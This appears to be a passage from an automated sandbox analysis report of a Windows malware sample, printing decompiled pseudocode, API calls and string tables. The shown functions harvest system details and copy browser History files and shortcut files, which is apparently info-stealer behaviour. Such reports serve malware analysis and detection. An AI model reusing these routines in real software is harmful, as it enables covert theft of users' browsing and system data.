Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00460000, Relevance: 25.3, Strings: 20, Instructions: 298COMMON

Download Yara Rule

Strings

e, xrefs: 0046024B
x, xrefs: 004600A1
l.x, xrefs: 004602BB
e, xrefs: 0046025D
x, xrefs: 00460254
apeee, xrefs: 00460482
\.x, xrefs: 004600D9
C\apeee, xrefs: 00460446
l.x, xrefs: 004604A9
., xrefs: 00460416
., xrefs: 0046008F
C\.x, xrefs: 004600BF
x, xrefs: 00460428
e, xrefs: 0046041F
C\efee, xrefs: 00460272
e, xrefs: 00460098
., xrefs: 00460242
e, xrefs: 00460431
e, xrefs: 004600AA
sl.x, xrefs: 004602A1

Memory Dump Source

Source File: 00000000.00000002.544411405.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false

Similarity

API ID:
String ID: .$.$.$C\.x$C\apeee$C\efee$\.x$apeee$e$e$e$e$e$e$l.x$l.x$sl.x$x$x$x
API String ID: 0-254566416
Opcode ID: 426ca3eb7a9548ad1b566aa284613dfef421f21e5941d9c93cf84ea490b1db87
Instruction ID: dc36ecf22c787cfee8ad182f13b2db42668d6507514366c841422545bf8e1a88
Opcode Fuzzy Hash: 426ca3eb7a9548ad1b566aa284613dfef421f21e5941d9c93cf84ea490b1db87
Instruction Fuzzy Hash: 29E12F10A14215C9DB31AF00C4046EBB7F1FF21B18F98D5CAC0995A751FB769DC6CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00413F58, Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 496
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00413F58(char __eax, int __ebx, void* __ecx, char __edx, void* __edi, signed int __esi, char _a4, char _a8, char _a12, intOrPtr _a16, char _a20) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v53;
				intOrPtr _v56;
				struct _WIN32_FIND_DATAW _v648;
				char _v652;
				char _v656;
				char _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				char _v680;
				char _v684;
				char _v688;
				char _v692;
				char _v696;
				intOrPtr _v700;
				char _v704;
				char _v708;
				char _v712;
				char _v716;
				char _v720;
				char _v724;
				char _v728;
				char _v732;
				char _v736;
				char _v740;
				char _v744;
				intOrPtr _v748;
				char _v752;
				char _v756;
				char _v760;
				char _v764;
				char _v768;
				char _v772;
				char _v776;
				char _v780;
				char _v784;
				char _v788;
				char _v792;
				void* _t239;
				void* _t295;
				intOrPtr* _t299;
				void* _t301;
				int _t312;
				int _t333;
				signed int _t343;
				long _t349;
				int _t354;
				int _t377;
				int _t383;
				void* _t387;
				intOrPtr* _t425;
				intOrPtr _t428;
				intOrPtr* _t456;
				int _t460;
				intOrPtr _t464;
				intOrPtr* _t471;
				intOrPtr _t486;
				intOrPtr _t496;
				intOrPtr _t497;
				intOrPtr _t499;
				void* _t534;
				void* _t556;
				void* _t570;
				void* _t573;
				signed int _t575;
				intOrPtr _t577;
				intOrPtr _t578;
				intOrPtr* _t579;

				_t574 = __esi;
				_t458 = __ebx;
				_t577 = _t578;
				_push(__ecx);
				_t464 = 0x62;
				do {
					_push(0);
					_push(0);
					_t464 = _t464 - 1;
					_t580 = _t464;
				} while (_t464 != 0);
				_t1 =  &_v8;
				 *_t1 = _t464;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00404150( &_v8);
				E00404150( &_v12);
				E00404150( &_v16);
				E00404150( &_a20);
				_push(_t577);
				_push(0x41475d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t578;
				_v20 = 0;
				E004062FC(_v8,  &_v652, _t580);
				E00403C3C( &_v8, _v652);
				E0040377C( &_v656, _a20);
				E00407A18(0x41477c,  &_v52, _v656, _t580);
				E0040377C( &_v660, _v12);
				E00407A18(0x414788,  &_v44, _v660, _t580);
				_t239 = E00404648(_v44);
				_t581 = _t239;
				if(_t239 == 0) {
					L46:
					_pop(_t486);
					 *[fs:eax] = _t486;
					_push(E00414767);
					E00403BF4( &_v792, 2);
					E00403508( &_v784, 2);
					E00403BDC( &_v776);
					E00403508( &_v772, 2);
					E00403BF4( &_v764, 6);
					E004034E4( &_v740);
					E00403BF4( &_v736, 5);
					E00403508( &_v716, 3);
					E00403BF4( &_v704, 3);
					E004034E4( &_v692);
					E00403BDC( &_v688);
					E004034E4( &_v684);
					E00403BF4( &_v680, 5);
					E00403508( &_v660, 2);
					E00403BDC( &_v652);
					_t496 =  *0x405f50; // 0x405f54
					E00404810( &_v52, _t496);
					E00403BDC( &_v48);
					_t497 =  *0x405f50; // 0x405f54
					E00404810( &_v44, _t497);
					E00403BF4( &_v40, 4);
					_t499 =  *0x413f34; // 0x413f38
					E00404810( &_v24, _t499);
					E00403BF4( &_v16, 3);
					return E00403BDC( &_a20);
				} else {
					_push(E00404648(_v24) + 1);
					E00404804();
					_t579 = _t578 + 4;
					_push(_v24 + E00404648(_v24) * 4 - 4);
					E004078D8(_v8, __ebx,  &_v664, _t581);
					_pop(_t295);
					E00403C18(_t295, _v664);
					while(E00404648(_v24) > 0) {
						_t299 =  *0x41b218; // 0x41cac4
						_t34 = _t299 + 4; // 0x0
						_t301 =  *_t299 - 0x4b000;
						asm("sbb edx, 0x0");
						_t471 =  *0x41b3fc; // 0x41cabc
						_t35 = _t471 + 4; // 0x0
						__eflags =  *_t34 -  *_t35;
						if(__eflags != 0) {
							if(__eflags <= 0) {
								goto L46;
							}
							L8:
							E004078D8( *((intOrPtr*)(_v24 + E00404648(_v24) * 4 - 4)), _t458,  &_v28, __eflags);
							E00403BDC(_v24 + E00404648(_v24) * 4 - 4);
							_t312 = E00404648(_v24) - 1;
							__eflags = _t312;
							_push(_t312);
							E00404804();
							_t579 = _t579 + 4;
							E00403E14( &_v672, 0x414790, _v28, __eflags);
							E004078D8(_v672, _t458,  &_v668, __eflags);
							_t573 = FindFirstFileW(E00403D98(_v668),  &_v648);
							do {
								_push(_v28);
								_push(0x41479c);
								_t474 = 0x104;
								E00403D6C( &_v680, 0x104,  &(_v648.cFileName));
								_push(_v680);
								E00403E78();
								E004078D8(_v676, _t458,  &_v32, __eflags);
								E004077C8(_v32, _t458, 0x104,  &_v36, _t574, __eflags);
								__eflags = (_v648.dwFileAttributes & 0x00000010) - 0x10;
								if((_v648.dwFileAttributes & 0x00000010) == 0x10) {
									L21:
									__eflags = _a8 - 1;
									if(_a8 != 1) {
										L30:
										__eflags = _a12 - 1;
										if(_a12 != 1) {
											goto L43;
										}
										E00403D6C( &_v756, 0x104,  &(_v648.cFileName));
										E00403EC0(_v756, 0x4147c0);
										if(__eflags == 0) {
											goto L43;
										}
										E00403D6C( &_v760, 0x104,  &(_v648.cFileName));
										E00403EC0(_v760, 0x4147cc);
										if(__eflags == 0) {
											goto L43;
										}
										_t343 = _v648.dwFileAttributes;
										__eflags = (_t343 & 0x00000010) - 0x10;
										if((_t343 & 0x00000010) != 0x10) {
											goto L43;
										}
										__eflags = (_t343 & 0x00000400) - 0x400;
										if(__eflags == 0) {
											goto L43;
										}
										E004078D8(_v32, _t458,  &_v764, __eflags);
										_t349 = GetFileAttributesW(E00403D98(_v764));
										__eflags = _t349 - 0xffffffff;
										if(_t349 == 0xffffffff) {
											goto L43;
										}
										_v53 = 0;
										_t458 = E00404648(_v52) - 1;
										__eflags = _t458;
										if(_t458 < 0) {
											L41:
											__eflags = _v53;
											if(_v53 == 0) {
												_t354 = E00404648(_v24) + 1;
												__eflags = _t354;
												_push(_t354);
												E00404804();
												_t579 = _t579 + 4;
												E00403C18(_v24 + E00404648(_v24) * 4 - 4, _v32);
											}
											goto L43;
										}
										_t460 = _t458 + 1;
										_t575 = 0;
										__eflags = 0;
										do {
											E004078D8(_v32, _t460,  &_v776, __eflags);
											E0040377C( &_v772, _v776);
											E0040633C(_v772, _t460,  &_v768, _t573, _t575);
											_push(_v768);
											E00403D88( &_v792,  *((intOrPtr*)(_v52 + _t575 * 4)));
											E004078D8(_v792, _t460,  &_v788, __eflags);
											E0040377C( &_v784, _v788);
											E0040633C(_v784, _t460,  &_v780, _t573, _t575);
											_pop(_t534);
											_t377 = E00403AD4(_v780, _t534);
											__eflags = _t377;
											if(_t377 != 0) {
												_v53 = 1;
											}
											_t575 = _t575 + 1;
											_t460 = _t460 - 1;
											__eflags = _t460;
										} while (__eflags != 0);
										goto L41;
									}
									E0040377C( &_v712, _v36);
									E0040633C(_v712, _t458,  &_v708, _t573, _t574);
									_t383 = E00403AD4(0x4147a8, _v708);
									__eflags = _t383;
									if(_t383 == 0) {
										goto L30;
									}
									E00413D08(_v32, _t458,  &_v40, _t574);
									_t387 = E00406910(_v40);
									__eflags = _t387 - _a16;
									if(_t387 > _a16) {
										goto L30;
									}
									_t458 = E00404648(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L30;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E004077C8(_v40, _t458, _t474,  &_v720, _t574, __eflags);
										E0040377C( &_v716, _v720);
										_t474 = 0;
										__eflags = E00406144(_v716, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(__eflags != 0) {
											continue;
										}
										goto L30;
									}
									E004078D8(_v32, _t458,  &_v724, __eflags);
									E00403C3C( &_v32, _v724);
									E004078D8(_v8, _t458,  &_v728, __eflags);
									E00403C3C( &_v8, _v728);
									E004078D8(_v40, _t458,  &_v732, __eflags);
									E00403C3C( &_v40, _v732);
									_push(_v32);
									_push("._.");
									E004077C8(_v40, _t458, 0,  &_v736, _t574, __eflags);
									_push(_v736);
									E00403E78();
									E00403F90( &_v48, E00403DA8(_v8), 1, __eflags);
									_push(_v16);
									_push(0x41479c);
									_push(_v48);
									E00403E78();
									E004078D8(_v748, _t458,  &_v744, __eflags);
									E0040377C( &_v740, _v744);
									_push(_v740);
									E004078D8(_v40, _t458,  &_v752, __eflags);
									_pop(_t556);
									E0040E79C(_v752, _t458, _t556, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_t425 =  *0x41b3f8; // 0x41b0ac
										 *_t425 =  *_t425 + 1;
									}
									goto L30;
								}
								__eflags = _v648.nFileSizeHigh;
								if(_v648.nFileSizeHigh != 0) {
									goto L21;
								}
								_push(0);
								_push(_v648.nFileSizeLow >> 0xa);
								_t428 = _a16;
								asm("cdq");
								__eflags = 0 - _v56;
								if(__eflags != 0) {
									if(__eflags < 0) {
										goto L21;
									}
									L15:
									_t458 = E00404648(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L21;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E0040377C( &_v684, _v36);
										_t474 = 0;
										__eflags = E00406144(_v684, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(_t458 != 0) {
											continue;
										}
										goto L21;
									}
									E004078D8(_v8, _t458,  &_v688, __eflags);
									E00403C3C( &_v8, _v688);
									E004078D8(_v32, _t458,  &_v48, __eflags);
									_t474 = E00403DA8(_v8);
									E00403F90( &_v48, _t443, 1, __eflags);
									_push(_v16);
									_push(0x41479c);
									_push(_v48);
									E00403E78();
									E004078D8(_v700, _t458,  &_v696, __eflags);
									E0040377C( &_v692, _v696);
									_push(_v692);
									E004078D8(_v32, _t458,  &_v704, __eflags);
									_pop(_t570);
									E0040E79C(_v704, _t458, _t570, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_t456 =  *0x41b3f8; // 0x41b0ac
										 *_t456 =  *_t456 + 1;
									}
									goto L21;
								}
								__eflags = _t428 -  *_t579;
								if(_t428 <  *_t579) {
									goto L21;
								}
								goto L15;
								L43:
								_t333 = FindNextFileW(_t573,  &_v648);
								__eflags = _t333;
							} while (_t333 != 0);
							FindClose(_t573);
							continue;
						}
						__eflags = _t301 -  *_t471;
						if(_t301 >  *_t471) {
							goto L8;
						} else {
							goto L46;
						}
					}
					goto L46;
				}
			}

0x00413f58
0x00413f58
0x00413f59
0x00413f5b
0x00413f5c
0x00413f61
0x00413f61
0x00413f63
0x00413f65
0x00413f65
0x00413f65
0x00413f68
0x00413f68
0x00413f6b
0x00413f6c
0x00413f6d
0x00413f6e
0x00413f71
0x00413f74
0x00413f7a
0x00413f82
0x00413f8a
0x00413f92
0x00413f99
0x00413f9a
0x00413f9f
0x00413fa2
0x00413fa7
0x00413fb3
0x00413fc1
0x00413fcf
0x00413fe2
0x00413ff0
0x00414003
0x0041400b
0x00414010
0x00414012
0x00414629
0x0041462b
0x0041462e
0x00414631
0x00414641
0x00414651
0x0041465c
0x0041466c
0x0041467c
0x00414687
0x00414697
0x004146a7
0x004146b7
0x004146c2
0x004146cd
0x004146d8
0x004146e8
0x004146f8
0x00414703
0x0041470b
0x00414711
0x00414719
0x00414721
0x00414727
0x00414734
0x0041473c
0x00414742
0x0041474f
0x0041475c
0x00414018
0x00414021
0x00414030
0x00414035
0x00414047
0x00414051
0x0041405c
0x0041405d
0x00414619
0x00414067
0x0041406c
0x00414071
0x00414076
0x00414079
0x0041407f
0x0041407f
0x00414082
0x0041408d
0x00000000
0x00000000
0x00414093
0x004140a5
0x004140b9
0x004140c6
0x004140c6
0x004140c7
0x004140d6
0x004140db
0x004140f3
0x00414104
0x0041411a
0x0041411c
0x0041411c
0x0041411f
0x00414130
0x00414135
0x0041413a
0x0041414b
0x00414159
0x00414164
0x00414172
0x00414175
0x004142a9
0x004142a9
0x004142ad
0x00414462
0x00414462
0x00414466
0x00000000
0x00000000
0x0041447d
0x0041448d
0x00414492
0x00000000
0x00000000
0x004144a9
0x004144b9
0x004144be
0x00000000
0x00000000
0x004144c4
0x004144cf
0x004144d2
0x00000000
0x00000000
0x004144dd
0x004144e2
0x00000000
0x00000000
0x004144f1
0x00414502
0x00414507
0x0041450a
0x00000000
0x00000000
0x00414510
0x0041451e
0x0041451f
0x00414521
0x004145c1
0x004145c1
0x004145c5
0x004145cf
0x004145cf
0x004145d0
0x004145df
0x004145e4
0x004145f9
0x004145f9
0x00000000
0x004145c5
0x00414527
0x00414528
0x00414528
0x0041452a
0x00414533
0x00414544
0x00414555
0x00414560
0x0041456d
0x0041457e
0x0041458f
0x004145a0
0x004145ab
0x004145ac
0x004145b1
0x004145b3
0x004145b5
0x004145b5
0x004145b9
0x004145ba
0x004145ba
0x004145ba
0x00000000
0x0041452a
0x004142bc
0x004142cd
0x004142dd
0x004142e2
0x004142e4
0x00000000
0x00000000
0x004142f0
0x004142f8
0x004142fd
0x00414300
0x00000000
0x00000000
0x00414310
0x00414311
0x00414313
0x00000000
0x00000000
0x00414319
0x0041431a
0x0041431a
0x0041431c
0x00414325
0x00414336
0x00414347
0x0041434e
0x00414350
0x00000000
0x00000000
0x0041445a
0x0041445b
0x0041445b
0x0041445c
0x00000000
0x00000000
0x00000000
0x0041445c
0x0041435f
0x0041436d
0x0041437b
0x00414389
0x00414397
0x004143a5
0x004143aa
0x004143ad
0x004143bb
0x004143c0
0x004143ce
0x004143e5
0x004143ea
0x004143ed
0x004143f2
0x00414400
0x00414411
0x00414422
0x0041442d
0x00414437
0x00414442
0x00414443
0x00414448
0x0041444b
0x0041444f
0x00414451
0x00414456
0x00414456
0x00000000
0x0041444f
0x0041417b
0x00414182
0x00000000
0x00000000
0x00414193
0x00414194
0x00414195
0x00414198
0x00414199
0x0041419d
0x004141ae
0x00000000
0x00000000
0x004141b4
0x004141be
0x004141bf
0x004141c1
0x00000000
0x00000000
0x004141c7
0x004141c8
0x004141c8
0x004141ca
0x004141d3
0x004141e4
0x004141eb
0x004141ed
0x00000000
0x00000000
0x004142a1
0x004142a2
0x004142a2
0x004142a3
0x00000000
0x00000000
0x00000000
0x004142a3
0x004141fc
0x0041420a
0x00414215
0x00414222
0x0041422c
0x00414231
0x00414234
0x00414239
0x00414247
0x00414258
0x00414269
0x00414274
0x0041427e
0x00414289
0x0041428a
0x0041428f
0x00414292
0x00414296
0x00414298
0x0041429d
0x0041429d
0x00000000
0x00414296
0x0041419f
0x004141a4
0x00000000
0x00000000
0x00000000
0x004145fe
0x00414606
0x0041460b
0x0041460b
0x00414614
0x00000000
0x00414614
0x00414084
0x00414086
0x00000000
0x00414088
0x00000000
0x00414088
0x00414086
0x00000000
0x00414619

APIs

FindFirstFileW.KERNEL32(00000000,?,?,0041A212), ref: 00414115

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Strings

8?A, xrefs: 0041402A, 004140D0, 004145D9, 0041473C
.LNK, xrefs: 004142D8
T_@, xrefs: 0041470B, 00414721
._., xrefs: 004143AD

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeString$FileFindFirst
String ID: .LNK$._.$8?A$T_@
API String ID: 1653790112-814392791
Opcode ID: da2de9fc49f94cc93a669c455afdc3715b485c1c019f6da893a1deca454250b6
Instruction ID: ccf2d574420f699031c81d78e58b697f7985245bee10ad08c344e755ebce9b4b
Opcode Fuzzy Hash: da2de9fc49f94cc93a669c455afdc3715b485c1c019f6da893a1deca454250b6
Instruction Fuzzy Hash: C2223F74A0011E9BDB10EF55C985ADEB7B9EF84308F1081B7E504B7291DB38AF868F59

Uniqueness

Uniqueness Score: -1.00%

Function 00415E40, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00415E40(signed int __eax, void* __ebx, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t38;
				signed int _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t112;
				void* _t116;
				intOrPtr _t119;
				intOrPtr _t120;

				_t117 = __esi;
				_t38 = __eax | 0x5500000a;
				_t119 = _t120;
				_t92 = 0xb;
				do {
					_push(0);
					_push(0);
					_t92 = _t92 - 1;
					_t122 = _t92;
				} while (_t92 != 0);
				_t91 = _t38;
				_push(_t119);
				_push(0x415fd0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t120;
				GetSystemInfo( &_v40);
				E00403D88( &_v48,  *_t91);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E004069A8("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t91,  &_v60, _t116, __esi);
				E00403D88( &_v56, _v60);
				_push(_v56);
				E004069A8("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t91,  &_v68, _t116, __esi);
				E00403D88( &_v64, _v68);
				_pop(_t93);
				E004075C0(0x80000002, _t91, _t93, _v64);
				_push(_v52);
				_push(0x416070);
				E00403E78();
				E0040377C(_t91, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t91);
				E00403D88( &_v76, _v80);
				_push(_v76);
				E0040709C(_v40.dwNumberOfProcessors, _t91,  &_v84, _t117, _t122);
				_push(_v84);
				_push(0x416070);
				E00403E78();
				E0040377C(_t91, _v72);
				_push( *_t91);
				_push("GetRAM: ");
				E00415CA0( &_v88, _t91, _t117, _t122);
				_push(_v88);
				_push(0x4160a8);
				E00403850();
				_push( *_t91);
				_push("Video Info\r\n");
				E00415D60( &_v92, _t91, _t116, _t117);
				_push(_v92);
				E00403850();
				_t112 = 0x4160a8;
				 *[fs:eax] = _t112;
				_push(E00415FD7);
				E00403508( &_v92, 2);
				E00403BDC( &_v84);
				E004034E4( &_v80);
				E00403BF4( &_v76, 2);
				E004034E4( &_v68);
				E00403BDC( &_v64);
				E004034E4( &_v60);
				return E00403BF4( &_v56, 4);
			}

0x00415e40
0x00415e40
0x00415e45
0x00415e47
0x00415e4c
0x00415e4c
0x00415e4e
0x00415e50
0x00415e50
0x00415e50
0x00415e54
0x00415e58
0x00415e59
0x00415e5e
0x00415e61
0x00415e68
0x00415e72
0x00415e77
0x00415e7a
0x00415e7f
0x00415e84
0x00415e8d
0x00415e98
0x00415ea0
0x00415ea9
0x00415eb4
0x00415ec1
0x00415ec2
0x00415ec7
0x00415eca
0x00415ed7
0x00415ee1
0x00415ef0
0x00415efb
0x00415f00
0x00415f09
0x00415f0e
0x00415f11
0x00415f1e
0x00415f28
0x00415f2d
0x00415f2f
0x00415f37
0x00415f3c
0x00415f3f
0x00415f4b
0x00415f50
0x00415f52
0x00415f5a
0x00415f5f
0x00415f6e
0x00415f75
0x00415f78
0x00415f7b
0x00415f88
0x00415f90
0x00415f98
0x00415fa5
0x00415fad
0x00415fb5
0x00415fbd
0x00415fcf

APIs

GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

GetRAM: , xrefs: 00415F2F
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 00415E88
CPU Model: , xrefs: 00415E7A
CPU Count: , xrefs: 00415EEB
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 00415EA4
Video Info, xrefs: 00415F52

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: 7aa5ba2eb47ed9e4c2041f62b90d0ceede878dd7ad1d197db477c6031a9cd598
Instruction ID: 196081fafed7d9336189c07f5dab181bd8ca6178f74fa25acf8eb9a608d7e1b8
Opcode Fuzzy Hash: 7aa5ba2eb47ed9e4c2041f62b90d0ceede878dd7ad1d197db477c6031a9cd598
Instruction Fuzzy Hash: C541F274A00108ABCB01EFD1D842FCDBBB9EF48305F91813BF504B7296D679EA468B59

Uniqueness

Uniqueness Score: -1.00%

Function 00412D6C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00412D6C(char __eax, void* __ebx, char __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr* _t73;
				void* _t110;
				intOrPtr _t127;
				intOrPtr _t132;
				void* _t144;
				void* _t145;
				intOrPtr _t146;

				_t142 = __esi;
				_t141 = __edi;
				_t144 = _t145;
				_t146 = _t145 + 0xfffffd74;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v632 = 0;
				_v636 = 0;
				_v648 = 0;
				_v652 = 0;
				_v656 = 0;
				_v640 = 0;
				_v644 = 0;
				_v624 = 0;
				_v628 = 0;
				_v620 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404150( &_v8);
				E00404150( &_v12);
				E00404150( &_v16);
				_push(_t144);
				_push(0x412fd4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t146;
				E00403E14( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D98(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x412ffc);
					E00403D6C( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x412ffc);
					_t73 =  *0x41b180; // 0x41c91c
					_push( *_t73);
					E00403E78();
					if(E0040776C(_v624, 0, 0x104) != 0) {
						_push(_t144);
						_push(0x412f48);
						_push( *[fs:eax]);
						 *[fs:eax] = _t146;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x412ffc);
							E00403D6C( &_v644, 0x104,  &(_v616.cFileName));
							_push(_v644);
							_push(L"\\History");
							E00403E78();
							E00412974(_v640, 0,  &_v636, _t141, _t142);
							E0040377C( &_v632, _v636);
							_push(_v632);
							_push(_v16);
							_push(0x412ffc);
							_push(_v12);
							_push(0x41301c);
							E00403D6C( &_v656, 0x104,  &(_v616.cFileName));
							_push(_v656);
							_push(L".txt");
							E00403E78();
							E0040377C( &_v648, _v652);
							_pop(_t110);
							E0040E6D4(_t110, 0, _v648, _t141, _t142);
						}
						_pop(_t132);
						 *[fs:eax] = _t132;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(E00412FDB);
				E00403BF4( &_v656, 2);
				E004034E4( &_v648);
				E00403BF4( &_v644, 3);
				E004034E4( &_v632);
				E00403BF4( &_v628, 3);
				return E00403BF4( &_v16, 3);
			}

0x00412d6c
0x00412d6c
0x00412d6d
0x00412d6f
0x00412d75
0x00412d76
0x00412d77
0x00412d7a
0x00412d80
0x00412d86
0x00412d8c
0x00412d92
0x00412d98
0x00412d9e
0x00412da4
0x00412daa
0x00412db0
0x00412db6
0x00412db9
0x00412dbc
0x00412dc2
0x00412dca
0x00412dd2
0x00412dd9
0x00412dda
0x00412ddf
0x00412de2
0x00412dfa
0x00412e10
0x00412e13
0x00412e13
0x00412e16
0x00412e2c
0x00412e31
0x00412e37
0x00412e3c
0x00412e41
0x00412e4e
0x00412e60
0x00412e68
0x00412e69
0x00412e6e
0x00412e71
0x00412e78
0x00412e7e
0x00412e81
0x00412e97
0x00412e9c
0x00412ea2
0x00412eb2
0x00412ec3
0x00412ed4
0x00412edf
0x00412ee0
0x00412ee3
0x00412ee8
0x00412eeb
0x00412f01
0x00412f06
0x00412f0c
0x00412f1c
0x00412f2d
0x00412f38
0x00412f39
0x00412f39
0x00412f40
0x00412f43
0x00412f43
0x00412f62
0x00412f6e
0x00412f75
0x00412f78
0x00412f7b
0x00412f8b
0x00412f96
0x00412fa6
0x00412fb1
0x00412fc1
0x00412fd3

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

FindFirstFileW.KERNEL32(00000000,?,00000000,00412FD4,?,00000000,?,00000000,?,00413361,00000000,00000000,00413B6D,?,00000000,00000024), ref: 00412E0B
FindNextFileW.KERNEL32(?,?,0041C91C,00412FFC,?,00412FFC,0041A212,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F5D
FindClose.KERNEL32(?,?,?,0041C91C,00412FFC,?,00412FFC,0041A212,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F6E

Part of subcall function 00412974: GetTickCount.KERNEL32 ref: 004129B8
Part of subcall function 00412974: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34

Strings

.txt, xrefs: 00412F0C
\*.*, xrefs: 00412DF2
\History, xrefs: 00412EA2

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
String ID: .txt$\*.*$\History
API String ID: 3908936366-2232271174
Opcode ID: 2a1da71cf4f321e8de6e9cdad0ec5a278b95c9ebbcb772d71ff5e323f66530a5
Instruction ID: b8b382f9890bf67c4ce716ca2eff32e8703a5b333aba7ace94e6d5da5dd104b6
Opcode Fuzzy Hash: 2a1da71cf4f321e8de6e9cdad0ec5a278b95c9ebbcb772d71ff5e323f66530a5
Instruction Fuzzy Hash: 14514C749042199BCF50EF61CD89ACDBBB8FB48304F5041FAA108B3291DB789F959F14

Uniqueness

Uniqueness Score: -1.00%

Function 00413030, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00413030(char __eax, void* __ebx, char __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr* _t72;
				void* _t108;
				intOrPtr _t126;
				intOrPtr _t139;
				void* _t143;
				void* _t144;
				intOrPtr _t145;

				_t141 = __esi;
				_t140 = __edi;
				_t143 = _t144;
				_t145 = _t144 + 0xfffffd74;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v632 = 0;
				_v636 = 0;
				_v648 = 0;
				_v652 = 0;
				_v656 = 0;
				_v640 = 0;
				_v644 = 0;
				_v624 = 0;
				_v628 = 0;
				_v620 = 0;
				_v16 = __ecx;
				_v12 = __edx;
